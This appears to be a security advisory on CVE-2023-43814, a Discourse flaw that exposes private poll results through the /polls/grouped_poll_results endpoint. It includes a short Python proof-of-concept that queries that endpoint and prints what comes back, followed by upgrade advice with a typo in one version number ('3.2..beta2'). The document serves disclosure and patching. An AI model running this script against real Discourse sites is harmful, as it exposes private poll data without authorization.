CVE-2023-43814: Discourse Unauthorized Poll Results Access Exploit

Over the years, Discourse has garnered immense popularity due to its open-source nature and robustness as a community discussion platform. However, the recent discovery of a security vulnerability, identified as CVE-2023-43814, has raised concerns over the privacy of Discourse's poll feature.

Summary of the Vulnerability

This exploit targets a specific endpoint in Discourse, /polls/grouped_poll_results, which allows unauthorized users to access the content of options, along with the number of votes for distinct groups of poll participants. As a result, this issue poses a severe threat to private polls with exclusive results only intended for authorized users.

Exploit Details

The following code snippet demonstrates how this exploit works and how it can obtain unauthorized access to poll details.

import requests

def exploit_discourse_poll_results(discourse_base_url, poll_topic_id):
    payload = {
        "topic_id": poll_topic_id
    }
    
    try:
      response = requests.get(url=f"{discourse_base_url}/polls/grouped_poll_results", params=payload)
    except requests.RequestException as e:
      print(f"Error while requesting Discourse poll results: {str(e)}")
      return
    if response.status_code == 200:
          print("Poll results retrieved successfully!")
          print(response.json())
    else:
          print("Failed to retrieve poll results!")

if __name__ == "__main__":
    discourse_instance = "https://YOUR-DISCOURSE-INSTANCE-URL";
    target_poll_topic = "12345"
    exploit_discourse_poll_results(discourse_instance, target_poll_topic)

Upon execution, this code snippet prints the retrieved poll results, if any.

Solution

To fix this vulnerability, you need to upgrade your Discourse version to either 3.1.1 stable or 3.2..beta2. Make sure you read the upgrade instructions specific to your system and backup your existing data before proceeding. All affected users should upgrade as soon as possible to protect their private poll information.

Original References

- Discourse CVE detailed report
- Discourse 3.1.1 stable release notes
- Discourse 3.2..beta2 release notes

Please find the original references above for more detailed information regarding this CVE and the specific changes in the patched versions of Discourse. Stay vigilant in monitoring the evolving security landscape and keeping your software up-to-date to maintain the privacy and integrity of your community discussions.

Timeline

Published on: 10/16/2023 22:15:12 UTC
Last modified on: 10/20/2023 17:48:38 UTC